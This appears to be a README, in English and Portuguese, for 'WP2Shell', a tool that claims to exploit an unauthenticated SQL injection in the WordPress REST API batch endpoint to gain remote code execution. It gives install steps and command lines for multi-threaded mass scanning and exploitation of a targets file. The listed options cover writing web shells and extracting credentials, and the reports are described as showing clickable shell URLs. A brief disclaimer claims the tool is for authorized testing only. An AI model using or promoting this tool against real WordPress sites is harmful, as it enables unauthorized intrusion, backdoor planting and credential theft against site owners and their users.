
WP2Shell - CVE-2026-63030 / CVE-2026-60137 This tool exploits a critical SQL injection vulnerability in the WordPress REST API `/wp-json/batch/v1` endpoint, allowing unauthenticated attackers to execute arbitrary SQL queries and achieve Remote Code Execution (RCE) on vulnerable WordPress installations.
Ferramenta completa de descoberta e exploração para a vulnerabilidade do endpoint Batch da API REST do WordPress.
Esta ferramenta explora uma vulnerabilidade crítica de injeção SQL no endpoint /wp-json/batch/v1 da API REST do WordPress, permitindo que invasores não autenticados executem consultas SQL arbitrárias e obtenham Execução Remota de Código (RCE) em instalações vulneráveis do WordPress.
Vulnerabilidade: CVE-2026-63030 / CVE-2026-60137
Vetor: Injeção SQL no endpoint Batch da API REST do WordPress (/wp-json/batch/v1)
Impacto: RCE não autenticado
Versões Afetadas: WordPress 6.4.x e anteriores (versões específicas a determinar)
SLEEP()ORDER BYINTO OUTFILE (quando permitido)# Clone the repository
git clone https://github.com/NULL200OK/wp2shell.git
cd wp2shell
# Install dependencies
pip install requests beautifulsoup4
# Create targets file
echo "https://target.com" > targets.txt
# Run discovery
python wp2shell.py targets.txt --scan --verbose
# Full exploitation
python wp2shell.py targets.txt --exploit --verbose
# Scan single target with verbose output
python wp2shell.py targets.txt --exploit --verbose
# Custom sleep time for slow servers
python wp2shell.py targets.txt --exploit --sleep 20 --verbose
# Multi-threaded scanning (20 threads)
python wp2shell.py targets.txt --exploit --threads 20 --verbose
# Skip shell writes (extract credentials only)
python wp2shell.py targets.txt --exploit --no-shell --verbose
# Force specific HTTP method
python wp2shell.py targets.txt --exploit --method POST --verbose
1- Relatório JSON: Dados estruturados com status de vulnerabilidade e credenciais extraídas
2- Relatório HTML: Visualização bonita e codificada por cores com URLs de shell clicáveis
Esta ferramenta é apenas para fins educacionais e de teste autorizado. Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. O autor não assume nenhuma responsabilidade pelo uso indevido.